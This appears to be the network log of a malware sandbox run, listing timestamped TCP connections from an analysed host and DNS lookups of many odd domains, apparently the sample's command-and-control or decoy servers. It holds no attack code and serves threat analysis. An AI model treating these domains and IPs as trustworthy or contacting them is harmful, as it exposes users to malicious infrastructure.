                                                                                                                          Oct 21, 2024 17:27:31.671125889 CEST80573553.33.130.190192.168.2.6
                                                                                                                          Oct 21, 2024 17:27:31.671287060 CEST5735580192.168.2.63.33.130.190
                                                                                                                          Oct 21, 2024 17:27:31.683005095 CEST5735580192.168.2.63.33.130.190
                                                                                                                          Oct 21, 2024 17:27:31.688695908 CEST80573553.33.130.190192.168.2.6
                                                                                                                          Oct 21, 2024 17:27:33.026463032 CEST80573553.33.130.190192.168.2.6
                                                                                                                          Oct 21, 2024 17:27:33.029166937 CEST5735580192.168.2.63.33.130.190
                                                                                                                          Oct 21, 2024 17:27:33.187560081 CEST5735580192.168.2.63.33.130.190
                                                                                                                          Oct 21, 2024 17:27:33.193294048 CEST80573553.33.130.190192.168.2.6
                                                                                                                          Oct 21, 2024 17:27:34.205751896 CEST5735680192.168.2.63.33.130.190
                                                                                                                          Oct 21, 2024 17:27:34.211441994 CEST80573563.33.130.190192.168.2.6
                                                                                                                          Oct 21, 2024 17:27:34.215187073 CEST5735680192.168.2.63.33.130.190
                                                                                                                          Oct 21, 2024 17:27:34.225598097 CEST5735680192.168.2.63.33.130.190
                                                                                                                          Oct 21, 2024 17:27:34.231215954 CEST80573563.33.130.190192.168.2.6
                                                                                                                          Oct 21, 2024 17:27:34.636784077 CEST80573563.33.130.190192.168.2.6
                                                                                                                          Oct 21, 2024 17:27:34.636976004 CEST5735680192.168.2.63.33.130.190
                                                                                                                          Oct 21, 2024 17:27:35.734543085 CEST5735680192.168.2.63.33.130.190
                                                                                                                          Oct 21, 2024 17:27:35.740077972 CEST80573563.33.130.190192.168.2.6
                                                                                                                          Oct 21, 2024 17:27:36.753124952 CEST5735780192.168.2.63.33.130.190
                                                                                                                          Oct 21, 2024 17:27:36.758693933 CEST80573573.33.130.190192.168.2.6
                                                                                                                          Oct 21, 2024 17:27:36.758785009 CEST5735780192.168.2.63.33.130.190
                                                                                                                          Oct 21, 2024 17:27:36.771065950 CEST5735780192.168.2.63.33.130.190
                                                                                                                          Oct 21, 2024 17:27:36.776552916 CEST80573573.33.130.190192.168.2.6
                                                                                                                          Oct 21, 2024 17:27:36.776601076 CEST80573573.33.130.190192.168.2.6
                                                                                                                          Oct 21, 2024 17:27:37.179653883 CEST80573573.33.130.190192.168.2.6
                                                                                                                          Oct 21, 2024 17:27:37.183224916 CEST5735780192.168.2.63.33.130.190
                                                                                                                          Oct 21, 2024 17:27:38.281357050 CEST5735780192.168.2.63.33.130.190
                                                                                                                          Oct 21, 2024 17:27:38.286768913 CEST80573573.33.130.190192.168.2.6
                                                                                                                          Oct 21, 2024 17:27:39.300009012 CEST5735880192.168.2.63.33.130.190
                                                                                                                          Oct 21, 2024 17:27:39.307147980 CEST80573583.33.130.190192.168.2.6
                                                                                                                          Oct 21, 2024 17:27:39.307235003 CEST5735880192.168.2.63.33.130.190
                                                                                                                          Oct 21, 2024 17:27:39.314145088 CEST5735880192.168.2.63.33.130.190
                                                                                                                          Oct 21, 2024 17:27:39.319554090 CEST80573583.33.130.190192.168.2.6
                                                                                                                          Oct 21, 2024 17:27:39.729233980 CEST80573583.33.130.190192.168.2.6
                                                                                                                          Oct 21, 2024 17:27:39.729418993 CEST80573583.33.130.190192.168.2.6
                                                                                                                          Oct 21, 2024 17:27:39.729473114 CEST5735880192.168.2.63.33.130.190
                                                                                                                          Oct 21, 2024 17:27:39.732743979 CEST5735880192.168.2.63.33.130.190
                                                                                                                          Oct 21, 2024 17:27:39.738188028 CEST80573583.33.130.190192.168.2.6
                                                                                                                          Oct 21, 2024 17:27:45.655119896 CEST5735980192.168.2.68.210.49.139
                                                                                                                          Oct 21, 2024 17:27:45.660739899 CEST80573598.210.49.139192.168.2.6
                                                                                                                          Oct 21, 2024 17:27:45.660819054 CEST5735980192.168.2.68.210.49.139
                                                                                                                          Oct 21, 2024 17:27:45.694704056 CEST5735980192.168.2.68.210.49.139
                                                                                                                          Oct 21, 2024 17:27:45.700588942 CEST80573598.210.49.139192.168.2.6
                                                                                                                          Oct 21, 2024 17:27:46.458865881 CEST80573598.210.49.139192.168.2.6
                                                                                                                          Oct 21, 2024 17:27:46.501070023 CEST5735980192.168.2.68.210.49.139
                                                                                                                          Oct 21, 2024 17:27:46.649688005 CEST80573598.210.49.139192.168.2.6
                                                                                                                          Oct 21, 2024 17:27:46.650007010 CEST5735980192.168.2.68.210.49.139
                                                                                                                          Oct 21, 2024 17:27:47.203214884 CEST5735980192.168.2.68.210.49.139
                                                                                                                          Oct 21, 2024 17:27:48.222223997 CEST5736080192.168.2.68.210.49.139
                                                                                                                          Oct 21, 2024 17:27:48.228331089 CEST80573608.210.49.139192.168.2.6
                                                                                                                          Oct 21, 2024 17:27:48.231168985 CEST5736080192.168.2.68.210.49.139
                                                                                                                          Oct 21, 2024 17:27:48.243247986 CEST5736080192.168.2.68.210.49.139
                                                                                                                          Oct 21, 2024 17:27:48.249123096 CEST80573608.210.49.139192.168.2.6
                                                                                                                          Oct 21, 2024 17:27:49.030792952 CEST80573608.210.49.139192.168.2.6
                                                                                                                          Oct 21, 2024 17:27:49.030817032 CEST80573608.210.49.139192.168.2.6
                                                                                                                          Oct 21, 2024 17:27:49.030879021 CEST5736080192.168.2.68.210.49.139
                                                                                                                          Oct 21, 2024 17:27:49.223922968 CEST80573608.210.49.139192.168.2.6
                                                                                                                          Oct 21, 2024 17:27:49.223984003 CEST5736080192.168.2.68.210.49.139
                                                                                                                          Oct 21, 2024 17:27:49.750205040 CEST5736080192.168.2.68.210.49.139
                                                                                                                          Oct 21, 2024 17:27:50.770870924 CEST5736180192.168.2.68.210.49.139
                                                                                                                          Oct 21, 2024 17:27:50.776309967 CEST80573618.210.49.139192.168.2.6
                                                                                                                          Oct 21, 2024 17:27:50.776410103 CEST5736180192.168.2.68.210.49.139
                                                                                                                          Oct 21, 2024 17:27:50.787072897 CEST5736180192.168.2.68.210.49.139
                                                                                                                          Oct 21, 2024 17:27:50.792484045 CEST80573618.210.49.139192.168.2.6
                                                                                                                          Oct 21, 2024 17:27:50.792546988 CEST80573618.210.49.139192.168.2.6
                                                                                                                          Oct 21, 2024 17:27:51.575293064 CEST80573618.210.49.139192.168.2.6
                                                                                                                          Oct 21, 2024 17:27:51.575453043 CEST80573618.210.49.139192.168.2.6
                                                                                                                          Oct 21, 2024 17:27:51.575500965 CEST5736180192.168.2.68.210.49.139
                                                                                                                          Oct 21, 2024 17:27:51.768105984 CEST80573618.210.49.139192.168.2.6
                                                                                                                          Oct 21, 2024 17:27:51.768183947 CEST5736180192.168.2.68.210.49.139
                                                                                                                          Oct 21, 2024 17:27:52.297396898 CEST5736180192.168.2.68.210.49.139
                                                                                                                          Oct 21, 2024 17:27:53.315942049 CEST5736280192.168.2.68.210.49.139
                                                                                                                          Oct 21, 2024 17:27:53.321672916 CEST80573628.210.49.139192.168.2.6
                                                                                                                          Oct 21, 2024 17:27:53.321780920 CEST5736280192.168.2.68.210.49.139
                                                                                                                          Oct 21, 2024 17:27:53.328782082 CEST5736280192.168.2.68.210.49.139
                                                                                                                          Oct 21, 2024 17:27:53.334211111 CEST80573628.210.49.139192.168.2.6
                                                                                                                          Oct 21, 2024 17:27:54.129630089 CEST80573628.210.49.139192.168.2.6
                                                                                                                          Oct 21, 2024 17:27:54.172058105 CEST5736280192.168.2.68.210.49.139
                                                                                                                          Oct 21, 2024 17:27:54.326843977 CEST80573628.210.49.139192.168.2.6
                                                                                                                          Oct 21, 2024 17:27:54.329360962 CEST5736280192.168.2.68.210.49.139
                                                                                                                          Oct 21, 2024 17:27:54.342894077 CEST5736280192.168.2.68.210.49.139
                                                                                                                          Oct 21, 2024 17:27:54.348242044 CEST80573628.210.49.139192.168.2.6
                                                                                                                          Oct 21, 2024 17:27:59.400691032 CEST5736380192.168.2.694.23.162.163
                                                                                                                          Oct 21, 2024 17:27:59.406212091 CEST805736394.23.162.163192.168.2.6
                                                                                                                          Oct 21, 2024 17:27:59.407335043 CEST5736380192.168.2.694.23.162.163
                                                                                                                          Oct 21, 2024 17:27:59.420944929 CEST5736380192.168.2.694.23.162.163
                                                                                                                          Oct 21, 2024 17:27:59.426381111 CEST805736394.23.162.163192.168.2.6
                                                                                                                          Oct 21, 2024 17:28:00.061923027 CEST805736394.23.162.163192.168.2.6
                                                                                                                          Oct 21, 2024 17:28:00.061995983 CEST5736380192.168.2.694.23.162.163
                                                                                                                          Oct 21, 2024 17:28:00.923353910 CEST5736380192.168.2.694.23.162.163
                                                                                                                          Oct 21, 2024 17:28:00.986318111 CEST805736394.23.162.163192.168.2.6
                                                                                                                          Oct 21, 2024 17:28:01.941860914 CEST5736680192.168.2.694.23.162.163
                                                                                                                          Oct 21, 2024 17:28:01.947598934 CEST805736694.23.162.163192.168.2.6
                                                                                                                          Oct 21, 2024 17:28:01.949300051 CEST5736680192.168.2.694.23.162.163
                                                                                                                          Oct 21, 2024 17:28:01.963342905 CEST5736680192.168.2.694.23.162.163
                                                                                                                          Oct 21, 2024 17:28:01.968825102 CEST805736694.23.162.163192.168.2.6
                                                                                                                          Oct 21, 2024 17:28:02.600846052 CEST805736694.23.162.163192.168.2.6
                                                                                                                          Oct 21, 2024 17:28:02.600944042 CEST5736680192.168.2.694.23.162.163
                                                                                                                          Oct 21, 2024 17:28:03.486187935 CEST5736680192.168.2.694.23.162.163
                                                                                                                          Oct 21, 2024 17:28:03.491976976 CEST805736694.23.162.163192.168.2.6
                                                                                                                          Oct 21, 2024 17:28:04.502902985 CEST5736780192.168.2.694.23.162.163
                                                                                                                          Oct 21, 2024 17:28:04.508609056 CEST805736794.23.162.163192.168.2.6
                                                                                                                          Oct 21, 2024 17:28:04.508764982 CEST5736780192.168.2.694.23.162.163
                                                                                                                          Oct 21, 2024 17:28:04.518980026 CEST5736780192.168.2.694.23.162.163
                                                                                                                          Oct 21, 2024 17:28:04.524374962 CEST805736794.23.162.163192.168.2.6
                                                                                                                          Oct 21, 2024 17:28:04.524454117 CEST805736794.23.162.163192.168.2.6
                                                                                                                          Oct 21, 2024 17:28:05.080471992 CEST805736794.23.162.163192.168.2.6
                                                                                                                          Oct 21, 2024 17:28:05.080539942 CEST5736780192.168.2.694.23.162.163
                                                                                                                          Oct 21, 2024 17:28:06.031361103 CEST5736780192.168.2.694.23.162.163
                                                                                                                          Oct 21, 2024 17:28:06.038563967 CEST805736794.23.162.163192.168.2.6
                                                                                                                          Oct 21, 2024 17:28:07.050117970 CEST5736880192.168.2.694.23.162.163
                                                                                                                          Oct 21, 2024 17:28:07.055793047 CEST805736894.23.162.163192.168.2.6
                                                                                                                          Oct 21, 2024 17:28:07.059144020 CEST5736880192.168.2.694.23.162.163
                                                                                                                          Oct 21, 2024 17:28:07.066732883 CEST5736880192.168.2.694.23.162.163
                                                                                                                          Oct 21, 2024 17:28:07.072263956 CEST805736894.23.162.163192.168.2.6
                                                                                                                          Oct 21, 2024 17:28:07.631675005 CEST805736894.23.162.163192.168.2.6
                                                                                                                          Oct 21, 2024 17:28:07.631716013 CEST805736894.23.162.163192.168.2.6
                                                                                                                          Oct 21, 2024 17:28:07.631732941 CEST805736894.23.162.163192.168.2.6
                                                                                                                          Oct 21, 2024 17:28:07.631769896 CEST5736880192.168.2.694.23.162.163
                                                                                                                          Oct 21, 2024 17:28:07.631942987 CEST805736894.23.162.163192.168.2.6
                                                                                                                          Oct 21, 2024 17:28:07.631963015 CEST805736894.23.162.163192.168.2.6
                                                                                                                          Oct 21, 2024 17:28:07.631978989 CEST805736894.23.162.163192.168.2.6
                                                                                                                          Oct 21, 2024 17:28:07.631989956 CEST5736880192.168.2.694.23.162.163
                                                                                                                          Oct 21, 2024 17:28:07.631994009 CEST805736894.23.162.163192.168.2.6
                                                                                                                          Oct 21, 2024 17:28:07.632016897 CEST5736880192.168.2.694.23.162.163
                                                                                                                          Oct 21, 2024 17:28:07.671870947 CEST5736880192.168.2.694.23.162.163
                                                                                                                          Oct 21, 2024 17:28:07.711057901 CEST805736894.23.162.163192.168.2.6
                                                                                                                          Oct 21, 2024 17:28:07.711175919 CEST5736880192.168.2.694.23.162.163
                                                                                                                          Oct 21, 2024 17:28:07.712079048 CEST5736880192.168.2.694.23.162.163
                                                                                                                          Oct 21, 2024 17:28:07.717619896 CEST805736894.23.162.163192.168.2.6
                                                                                                                          Oct 21, 2024 17:28:24.677115917 CEST5736980192.168.2.6188.114.96.3
                                                                                                                          Oct 21, 2024 17:28:24.682651043 CEST8057369188.114.96.3192.168.2.6
                                                                                                                          Oct 21, 2024 17:28:24.682790995 CEST5736980192.168.2.6188.114.96.3
                                                                                                                          Oct 21, 2024 17:28:24.690052986 CEST5736980192.168.2.6188.114.96.3
                                                                                                                          Oct 21, 2024 17:28:24.695385933 CEST8057369188.114.96.3192.168.2.6
                                                                                                                          Oct 21, 2024 17:28:25.255880117 CEST8057369188.114.96.3192.168.2.6
                                                                                                                          Oct 21, 2024 17:28:25.258739948 CEST8057369188.114.96.3192.168.2.6
                                                                                                                          Oct 21, 2024 17:28:25.263211012 CEST5736980192.168.2.6188.114.96.3
                                                                                                                          Oct 21, 2024 17:28:25.266088009 CEST5736980192.168.2.6188.114.96.3
                                                                                                                          Oct 21, 2024 17:28:25.271924019 CEST8057369188.114.96.3192.168.2.6
                                                                                                                          Oct 21, 2024 17:28:30.268224955 CEST5737080192.168.2.652.13.151.179
Oct 21, 2024 17:28:30.273767948 CEST | 80 | 57370 | 52.13.151.179 | 192.168.2.6
Oct 21, 2024 17:28:30.273936987 CEST | 57370 | 80 | 192.168.2.6 | 52.13.151.179
Oct 21, 2024 17:28:30.283085108 CEST | 57370 | 80 | 192.168.2.6 | 52.13.151.179
Oct 21, 2024 17:28:30.288474083 CEST | 80 | 57370 | 52.13.151.179 | 192.168.2.6
Oct 21, 2024 17:28:30.849168062 CEST | 80 | 57370 | 52.13.151.179 | 192.168.2.6
Oct 21, 2024 17:28:30.849183083 CEST | 80 | 57370 | 52.13.151.179 | 192.168.2.6
Oct 21, 2024 17:28:30.849500895 CEST | 57370 | 80 | 192.168.2.6 | 52.13.151.179
Oct 21, 2024 17:28:30.928471088 CEST | 80 | 57370 | 52.13.151.179 | 192.168.2.6
Oct 21, 2024 17:28:30.928622007 CEST | 57370 | 80 | 192.168.2.6 | 52.13.151.179
Oct 21, 2024 17:28:31.796945095 CEST | 57370 | 80 | 192.168.2.6 | 52.13.151.179
Oct 21, 2024 17:28:32.819103956 CEST | 57371 | 80 | 192.168.2.6 | 52.13.151.179
Oct 21, 2024 17:28:32.824635983 CEST | 80 | 57371 | 52.13.151.179 | 192.168.2.6
Oct 21, 2024 17:28:32.827173948 CEST | 57371 | 80 | 192.168.2.6 | 52.13.151.179
Oct 21, 2024 17:28:32.839207888 CEST | 57371 | 80 | 192.168.2.6 | 52.13.151.179
Oct 21, 2024 17:28:32.844686031 CEST | 80 | 57371 | 52.13.151.179 | 192.168.2.6
Oct 21, 2024 17:28:33.397758961 CEST | 80 | 57371 | 52.13.151.179 | 192.168.2.6
Oct 21, 2024 17:28:33.397772074 CEST | 80 | 57371 | 52.13.151.179 | 192.168.2.6
Oct 21, 2024 17:28:33.397854090 CEST | 57371 | 80 | 192.168.2.6 | 52.13.151.179
Oct 21, 2024 17:28:33.476238966 CEST | 80 | 57371 | 52.13.151.179 | 192.168.2.6
Oct 21, 2024 17:28:33.476428986 CEST | 57371 | 80 | 192.168.2.6 | 52.13.151.179
Oct 21, 2024 17:28:34.343801022 CEST | 57371 | 80 | 192.168.2.6 | 52.13.151.179
Oct 21, 2024 17:28:35.361877918 CEST | 57372 | 80 | 192.168.2.6 | 52.13.151.179
Oct 21, 2024 17:28:35.367502928 CEST | 80 | 57372 | 52.13.151.179 | 192.168.2.6
Oct 21, 2024 17:28:35.368457079 CEST | 57372 | 80 | 192.168.2.6 | 52.13.151.179
Oct 21, 2024 17:28:35.377890110 CEST | 57372 | 80 | 192.168.2.6 | 52.13.151.179
Oct 21, 2024 17:28:35.383331060 CEST | 80 | 57372 | 52.13.151.179 | 192.168.2.6
Oct 21, 2024 17:28:35.383882046 CEST | 80 | 57372 | 52.13.151.179 | 192.168.2.6
Oct 21, 2024 17:28:35.945580006 CEST | 80 | 57372 | 52.13.151.179 | 192.168.2.6
Oct 21, 2024 17:28:35.945635080 CEST | 80 | 57372 | 52.13.151.179 | 192.168.2.6
Oct 21, 2024 17:28:35.945799112 CEST | 57372 | 80 | 192.168.2.6 | 52.13.151.179
Oct 21, 2024 17:28:36.026292086 CEST | 80 | 57372 | 52.13.151.179 | 192.168.2.6
Oct 21, 2024 17:28:36.026390076 CEST | 57372 | 80 | 192.168.2.6 | 52.13.151.179
Oct 21, 2024 17:28:36.890839100 CEST | 57372 | 80 | 192.168.2.6 | 52.13.151.179
Oct 21, 2024 17:28:37.908946991 CEST | 57373 | 80 | 192.168.2.6 | 52.13.151.179
Oct 21, 2024 17:28:37.916708946 CEST | 80 | 57373 | 52.13.151.179 | 192.168.2.6
Oct 21, 2024 17:28:37.916794062 CEST | 57373 | 80 | 192.168.2.6 | 52.13.151.179
Oct 21, 2024 17:28:37.922907114 CEST | 57373 | 80 | 192.168.2.6 | 52.13.151.179
Oct 21, 2024 17:28:37.928929090 CEST | 80 | 57373 | 52.13.151.179 | 192.168.2.6
Oct 21, 2024 17:28:38.488610983 CEST | 80 | 57373 | 52.13.151.179 | 192.168.2.6
Oct 21, 2024 17:28:38.488630056 CEST | 80 | 57373 | 52.13.151.179 | 192.168.2.6
Oct 21, 2024 17:28:38.488784075 CEST | 57373 | 80 | 192.168.2.6 | 52.13.151.179
Oct 21, 2024 17:28:38.567974091 CEST | 80 | 57373 | 52.13.151.179 | 192.168.2.6
Oct 21, 2024 17:28:38.568147898 CEST | 57373 | 80 | 192.168.2.6 | 52.13.151.179
Oct 21, 2024 17:28:38.568907022 CEST | 57373 | 80 | 192.168.2.6 | 52.13.151.179
Oct 21, 2024 17:28:38.574894905 CEST | 80 | 57373 | 52.13.151.179 | 192.168.2.6
Oct 21, 2024 17:28:51.643209934 CEST | 57374 | 80 | 192.168.2.6 | 103.106.67.112
Oct 21, 2024 17:28:51.649172068 CEST | 80 | 57374 | 103.106.67.112 | 192.168.2.6
Oct 21, 2024 17:28:51.649295092 CEST | 57374 | 80 | 192.168.2.6 | 103.106.67.112
Oct 21, 2024 17:28:51.659837961 CEST | 57374 | 80 | 192.168.2.6 | 103.106.67.112
Oct 21, 2024 17:28:51.665360928 CEST | 80 | 57374 | 103.106.67.112 | 192.168.2.6
Oct 21, 2024 17:28:52.252650976 CEST | 80 | 57374 | 103.106.67.112 | 192.168.2.6
Oct 21, 2024 17:28:52.296977043 CEST | 57374 | 80 | 192.168.2.6 | 103.106.67.112
Oct 21, 2024 17:28:52.308633089 CEST | 80 | 57374 | 103.106.67.112 | 192.168.2.6
Oct 21, 2024 17:28:52.308801889 CEST | 57374 | 80 | 192.168.2.6 | 103.106.67.112
Oct 21, 2024 17:28:53.172107935 CEST | 57374 | 80 | 192.168.2.6 | 103.106.67.112
Oct 21, 2024 17:28:54.190395117 CEST | 57375 | 80 | 192.168.2.6 | 103.106.67.112
Oct 21, 2024 17:28:54.195894957 CEST | 80 | 57375 | 103.106.67.112 | 192.168.2.6
Oct 21, 2024 17:28:54.196043968 CEST | 57375 | 80 | 192.168.2.6 | 103.106.67.112
Oct 21, 2024 17:28:54.206171036 CEST | 57375 | 80 | 192.168.2.6 | 103.106.67.112
Oct 21, 2024 17:28:54.211589098 CEST | 80 | 57375 | 103.106.67.112 | 192.168.2.6
Oct 21, 2024 17:28:54.807488918 CEST | 80 | 57375 | 103.106.67.112 | 192.168.2.6
Oct 21, 2024 17:28:54.859421968 CEST | 57375 | 80 | 192.168.2.6 | 103.106.67.112
Oct 21, 2024 17:28:54.862147093 CEST | 80 | 57375 | 103.106.67.112 | 192.168.2.6
Oct 21, 2024 17:28:54.862272024 CEST | 57375 | 80 | 192.168.2.6 | 103.106.67.112
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 21, 2024 17:24:45.340405941 CEST | 58380 | 53 | 192.168.2.6 | 1.1.1.1
Oct 21, 2024 17:24:45.359837055 CEST | 53 | 58380 | 1.1.1.1 | 192.168.2.6
Oct 21, 2024 17:25:06.003530979 CEST | 53296 | 53 | 192.168.2.6 | 1.1.1.1
Oct 21, 2024 17:25:06.063461065 CEST | 53 | 53296 | 1.1.1.1 | 192.168.2.6
Oct 21, 2024 17:25:19.378331900 CEST | 59170 | 53 | 192.168.2.6 | 1.1.1.1
Oct 21, 2024 17:25:19.388510942 CEST | 53 | 59170 | 1.1.1.1 | 192.168.2.6
Oct 21, 2024 17:25:27.464391947 CEST | 51826 | 53 | 192.168.2.6 | 1.1.1.1
Oct 21, 2024 17:25:27.857553005 CEST | 53 | 51826 | 1.1.1.1 | 192.168.2.6
Oct 21, 2024 17:25:41.393901110 CEST | 55464 | 53 | 192.168.2.6 | 1.1.1.1
Oct 21, 2024 17:25:41.409893036 CEST | 53 | 55464 | 1.1.1.1 | 192.168.2.6
Oct 21, 2024 17:25:54.597754002 CEST | 60735 | 53 | 192.168.2.6 | 1.1.1.1
Oct 21, 2024 17:25:54.616698980 CEST | 53 | 60735 | 1.1.1.1 | 192.168.2.6
Oct 21, 2024 17:26:09.879092932 CEST | 60276 | 53 | 192.168.2.6 | 1.1.1.1
Oct 21, 2024 17:26:09.887530088 CEST | 53 | 60276 | 1.1.1.1 | 192.168.2.6
Oct 21, 2024 17:26:23.910376072 CEST | 63974 | 53 | 192.168.2.6 | 1.1.1.1
Oct 21, 2024 17:26:23.959274054 CEST | 53 | 63974 | 1.1.1.1 | 192.168.2.6
Oct 21, 2024 17:26:37.300523996 CEST | 63410 | 53 | 192.168.2.6 | 1.1.1.1
Oct 21, 2024 17:26:38.143071890 CEST | 53 | 63410 | 1.1.1.1 | 192.168.2.6
Oct 21, 2024 17:26:51.425838947 CEST | 64747 | 53 | 192.168.2.6 | 1.1.1.1
Oct 21, 2024 17:26:51.451594114 CEST | 53 | 64747 | 1.1.1.1 | 192.168.2.6
Oct 21, 2024 17:27:04.755084038 CEST | 60960 | 53 | 192.168.2.6 | 1.1.1.1
Oct 21, 2024 17:27:04.972240925 CEST | 53 | 60960 | 1.1.1.1 | 192.168.2.6
Oct 21, 2024 17:27:18.346808910 CEST | 52518 | 53 | 192.168.2.6 | 1.1.1.1
Oct 21, 2024 17:27:18.527806044 CEST | 53 | 52518 | 1.1.1.1 | 192.168.2.6
Oct 21, 2024 17:27:31.628984928 CEST | 60606 | 53 | 192.168.2.6 | 1.1.1.1
Oct 21, 2024 17:27:31.663156986 CEST | 53 | 60606 | 1.1.1.1 | 192.168.2.6
Oct 21, 2024 17:27:44.739072084 CEST | 60438 | 53 | 192.168.2.6 | 1.1.1.1
Oct 21, 2024 17:27:45.608645916 CEST | 53 | 60438 | 1.1.1.1 | 192.168.2.6
Oct 21, 2024 17:27:59.346720934 CEST | 49211 | 53 | 192.168.2.6 | 1.1.1.1
Oct 21, 2024 17:27:59.398462057 CEST | 53 | 49211 | 1.1.1.1 | 192.168.2.6
Oct 21, 2024 17:28:12.722768068 CEST | 57201 | 53 | 192.168.2.6 | 1.1.1.1
Oct 21, 2024 17:28:12.738892078 CEST | 53 | 57201 | 1.1.1.1 | 192.168.2.6
Oct 21, 2024 17:28:43.579510927 CEST | 63850 | 53 | 192.168.2.6 | 1.1.1.1
Oct 21, 2024 17:28:43.590385914 CEST | 53 | 63850 | 1.1.1.1 | 192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 21, 2024 17:24:45.340405941 CEST | 192.168.2.6 | 1.1.1.1 | 0x3807 | Standard query (0) | www.itemsort.shop | A (IP address) | IN (0x0001) | false
Oct 21, 2024 17:25:06.003530979 CEST | 192.168.2.6 | 1.1.1.1 | 0x33f1 | Standard query (0) | www.rudemyvague.info | A (IP address) | IN (0x0001) | false
Oct 21, 2024 17:25:19.378331900 CEST | 192.168.2.6 | 1.1.1.1 | 0x7132 | Standard query (0) | www.gws-treinamento2.shop | A (IP address) | IN (0x0001) | false
Oct 21, 2024 17:25:27.464391947 CEST | 192.168.2.6 | 1.1.1.1 | 0xd6d7 | Standard query (0) | www.sailforever.xyz | A (IP address) | IN (0x0001) | false
Oct 21, 2024 17:25:41.393901110 CEST | 192.168.2.6 | 1.1.1.1 | 0xf494 | Standard query (0) | www.launchdreamidea.xyz | A (IP address) | IN (0x0001) | false
Oct 21, 2024 17:25:54.597754002 CEST | 192.168.2.6 | 1.1.1.1 | 0xa8a | Standard query (0) | www.mondayigboleague.info | A (IP address) | IN (0x0001) | false
Oct 21, 2024 17:26:09.879092932 CEST | 192.168.2.6 | 1.1.1.1 | 0x370a | Standard query (0) | www.stocksm.fun | A (IP address) | IN (0x0001) | false
Oct 21, 2024 17:26:23.910376072 CEST | 192.168.2.6 | 1.1.1.1 | 0x16a0 | Standard query (0) | www.drevohome.shop | A (IP address) | IN (0x0001) | false
Oct 21, 2024 17:26:37.300523996 CEST | 192.168.2.6 | 1.1.1.1 | 0x378d | Standard query (0) | www.givingaway123.net | A (IP address) | IN (0x0001) | false
Oct 21, 2024 17:26:51.425838947 CEST | 192.168.2.6 | 1.1.1.1 | 0x6f38 | Standard query (0) | www.jagdud.store | A (IP address) | IN (0x0001) | false
Oct 21, 2024 17:27:04.755084038 CEST | 192.168.2.6 | 1.1.1.1 | 0xfd12 | Standard query (0) | www.030002837.xyz | A (IP address) | IN (0x0001) | false
Oct 21, 2024 17:27:18.346808910 CEST | 192.168.2.6 | 1.1.1.1 | 0x1c9 | Standard query (0) | www.ethetf.digital | A (IP address) | IN (0x0001) | false
Oct 21, 2024 17:27:31.628984928 CEST | 192.168.2.6 | 1.1.1.1 | 0x2c3e | Standard query (0) | www.booosted.xyz | A (IP address) | IN (0x0001) | false
Oct 21, 2024 17:27:44.739072084 CEST | 192.168.2.6 | 1.1.1.1 | 0xa090 | Standard query (0) | www.djazdgc.tokyo | A (IP address) | IN (0x0001) | false
Oct 21, 2024 17:27:59.346720934 CEST | 192.168.2.6 | 1.1.1.1 | 0x490 | Standard query (0) | www.productanalytics.pro | A (IP address) | IN (0x0001) | false
Oct 21, 2024 17:28:12.722768068 CEST | 192.168.2.6 | 1.1.1.1 | 0xad2e | Standard query (0) | www.kmjai8jf.icu | A (IP address) | IN (0x0001) | false
Oct 21, 2024 17:28:43.579510927 CEST | 192.168.2.6 | 1.1.1.1 | 0xfbd2 | Standard query (0) | www.gws-treinamento2.shop | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 21, 2024 17:24:45.359837055 CEST | 1.1.1.1 | 192.168.2.6 | 0x3807 | No error (0) | www.itemsort.shop | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Oct 21, 2024 17:24:45.359837055 CEST | 1.1.1.1 | 192.168.2.6 | 0x3807 | No error (0) | www.itemsort.shop | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Oct 21, 2024 17:25:06.063461065 CEST | 1.1.1.1 | 192.168.2.6 | 0x33f1 | No error (0) | www.rudemyvague.info | | 52.13.151.179 | A (IP address) | IN (0x0001) | false
Oct 21, 2024 17:25:19.388510942 CEST | 1.1.1.1 | 192.168.2.6 | 0x7132 | Name error (3) | www.gws-treinamento2.shop | none | none | A (IP address) | IN (0x0001) | false
Oct 21, 2024 17:25:27.857553005 CEST | 1.1.1.1 | 192.168.2.6 | 0xd6d7 | No error (0) | www.sailforever.xyz | | 103.106.67.112 | A (IP address) | IN (0x0001) | false
Oct 21, 2024 17:25:41.409893036 CEST | 1.1.1.1 | 192.168.2.6 | 0xf494 | No error (0) | www.launchdreamidea.xyz | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Oct 21, 2024 17:25:41.409893036 CEST | 1.1.1.1 | 192.168.2.6 | 0xf494 | No error (0) | www.launchdreamidea.xyz | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Oct 21, 2024 17:25:54.616698980 CEST | 1.1.1.1 | 192.168.2.6 | 0xa8a | No error (0) | www.mondayigboleague.info | mondayigboleague.info | | CNAME (Canonical name) | IN (0x0001) | false
Oct 21, 2024 17:25:54.616698980 CEST | 1.1.1.1 | 192.168.2.6 | 0xa8a | No error (0) | mondayigboleague.info | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Oct 21, 2024 17:25:54.616698980 CEST | 1.1.1.1 | 192.168.2.6 | 0xa8a | No error (0) | mondayigboleague.info | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Oct 21, 2024 17:26:23.959274054 CEST | 1.1.1.1 | 192.168.2.6 | 0x16a0 | No error (0) | www.drevohome.shop | | 94.23.162.163 | A (IP address) | IN (0x0001) | false
Oct 21, 2024 17:26:38.143071890 CEST | 1.1.1.1 | 192.168.2.6 | 0x378d | No error (0) | www.givingaway123.net | | 103.224.182.242 | A (IP address) | IN (0x0001) | false
Oct 21, 2024 17:26:51.451594114 CEST | 1.1.1.1 | 192.168.2.6 | 0x6f38 | No error (0) | www.jagdud.store | | 209.74.64.187 | A (IP address) | IN (0x0001) | false
Oct 21, 2024 17:27:04.972240925 CEST | 1.1.1.1 | 192.168.2.6 | 0xfd12 | No error (0) | www.030002837.xyz | 030002837.xyz | | CNAME (Canonical name) | IN (0x0001) | false
Oct 21, 2024 17:27:04.972240925 CEST | 1.1.1.1 | 192.168.2.6 | 0xfd12 | No error (0) | 030002837.xyz | | 65.21.196.90 | A (IP address) | IN (0x0001) | false
